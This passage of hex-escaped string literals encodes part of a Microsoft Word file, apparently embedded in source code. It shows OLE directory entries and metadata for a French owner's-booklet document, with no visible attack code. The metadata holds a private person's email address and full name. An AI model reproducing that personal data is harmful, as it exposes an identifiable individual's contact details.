+"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff"
+"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xae\x0f\x6a\x00\xff"
+"\xff\x12\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x4c\x00\x45\x00\x20"
+"\x00\x4c\x00\x49\x00\x56\x00\x52\x00\x45\x00\x54\x00\x20\x00\x44"
+"\x00\x55\x00\x20\x00\x50\x00\x52\x00\x4f\x00\x50\x00\x52\x00\x49"
+"\x00\x45\x00\x54\x00\x41\x00\x49\x00\x52\x00\x45\x00\x20\x00\x44"
+"\x00\x45\x00\x00\x00\x00\x00\x00\x00\x03\x00\x2a\x00\x2a\x00\x2a"
+"\x00\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
+"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x16\x00\x05\x01\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00"
+"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x9f\xde\x2d"
+"\x61\x5a\xc6\x01\xe1\x00\x00\x00\x80\x05\x00\x00\x00\x00\x00\x00"
+"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00"
+"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00"
+"\x57\x00\x6f\x00\x72\x00\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00"
+"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\xb4\x00\x00\x00\x00"
+"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00"
+"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00"
+"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00"
+"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00"
+"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff"
+"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00"
+"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00"
+"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00"
+"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00"
+"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00"
+"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00"
+"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00"
+"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00"
+"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00"
+"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00"
+"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00"
+"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00"
+"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00"
+"\xc9\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff"
+"\xd0\x00\x00\x00\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff"
+"\xfe\xff\xff\xff\xcf\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xd1\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\xfe\xff\xff\xff\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
+"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
+"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
+"\x15\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x03\x00\x00\x00\x0e\x00\x00\x00\x5f\x00\x45\x00\x6d\x00\x61\x00"
+"\x69\x00\x6c\x00\x53\x00\x75\x00\x62\x00\x6a\x00\x65\x00\x63\x00"
+"\x74\x00\x00\x00\x04\x00\x00\x00\x0d\x00\x00\x00\x5f\x00\x41\x00"
+"\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00\x6d\x00\x61\x00"
+"\x69\x00\x6c\x00\x00\x00\x00\x00\x05\x00\x00\x00\x18\x00\x00\x00"
+"\x5f\x00\x41\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00"
+"\x6d\x00\x61\x00\x69\x00\x6c\x00\x44\x00\x69\x00\x73\x00\x70\x00"
+"\x6c\x00\x61\x00\x79\x00\x4e\x00\x61\x00\x6d\x00\x65\x00\x00\x00"
+"\x02\x00\x00\x00\xb0\x04\x00\x00\x13\x00\x00\x00\x0c\x04\x00\x00"
+"\x03\x00\x00\x00\x0c\xcb\xf4\x5d\x1f\x00\x00\x00\x2f\x00\x00\x00"
+"\x6d\x00\x69\x00\x73\x00\x65\x00\x20\x00\x20\x00\x6a\x00\x6f\x00"
+"\x75\x00\x72\x00\x20\x00\x72\x00\xe9\x00\x67\x00\x6c\x00\x65\x00"
+"\x6d\x00\x65\x00\x6e\x00\x74\x00\x73\x00\x20\x00\x2b\x00\x20\x00"
+"\x66\x00\x65\x00\x75\x00\x69\x00\x6c\x00\x6c\x00\x65\x00\x20\x00"
+"\x65\x00\x6e\x00\x67\x00\x61\x00\x67\x00\x65\x00\x6d\x00\x65\x00"
+"\x6e\x00\x74\x00\x20\x00\x45\x00\x4e\x00\x43\x00\x00\x00\x00\x00"
+"\x1f\x00\x00\x00\x1a\x00\x00\x00\x70\x00\x69\x00\x63\x00\x61\x00"
+"\x72\x00\x64\x00\x65\x00\x6e\x00\x40\x00\x63\x00\x6c\x00\x75\x00"
+"\x62\x00\x2d\x00\x69\x00\x6e\x00\x74\x00\x65\x00\x72\x00\x6e\x00"
+"\x65\x00\x74\x00\x2e\x00\x66\x00\x72\x00\x00\x00\x1f\x00\x00\x00"
+"\x10\x00\x00\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00"
+"\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00"
+"\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00"
+"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x09\x00\x00\x00\x24\x03\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x11\x00\x00\x03\x00\x00\x00"
+"\x0c\x62\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00"
+"\x09\x00\x00\x00\x50\x61\x74\x72\x69\x63\x69\x61\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\xd5\xcd\xd5"
+"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x44\x00\x00\x00"
+"\x05\xd5\xcd\xd5\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae"
+"\x4c\x01\x00\x00\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00"
+"\x68\x00\x00\x00\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00"
+"\x80\x00\x00\x00\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00"
+"\x90\x00\x00\x00\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00"
+"\xa0\x00\x00\x00\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00"
+"\xb0\x00\x00\x00\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00"
+"\xc0\x00\x00\x00\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00"
+"\xe4\x04\x00\x00\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a"
+"\x00\x00\x45\x00\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00"
+"\x3b\x00\x00\x00\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00"
+"\x41\x0a\x0a\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00"
+"\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00"
+"\x00\x00\x00\x00\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00"
+"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f"
+"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00"
+"\x00\x02\x00\x00\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74"
+"\x72\x65\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xd8\x01\x00\x00"
+"\x07\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x01\x00\x00\x00"
+"\xf4\x00\x00\x00\x00\x00\x00\x80\xfc\x00\x00\x00\x02\x00\x00\x00"
+"\x04\x01\x00\x00\x03\x00\x00\x00\x0c\x01\x00\x00\x04\x00\x00\x00"
+"\x74\x01\x00\x00\x05\x00\x00\x00\xb0\x01\x00\x00\x04\x00\x00\x00"
+"\x02\x00\x00\x00\x14\x00\x00\x00\x5f\x00\x41\x00\x64\x00\x48\x00"
+"\x6f\x00\x63\x00\x52\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00"
+"\x43\x00\x79\x00\x63\x00\x6c\x00\x65\x00\x49\x00\x44\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\xd5\xcd\xd5"
+"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x30\x00\x00\x00"
+"\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x68\x00\x00\x00"
+"\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00\x80\x00\x00\x00"
+"\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00\x90\x00\x00\x00"
+"\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00\xa0\x00\x00\x00"
+"\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00\xb0\x00\x00\x00"
+"\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00\xc0\x00\x00\x00"
+"\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00\xe4\x04\x00\x00"
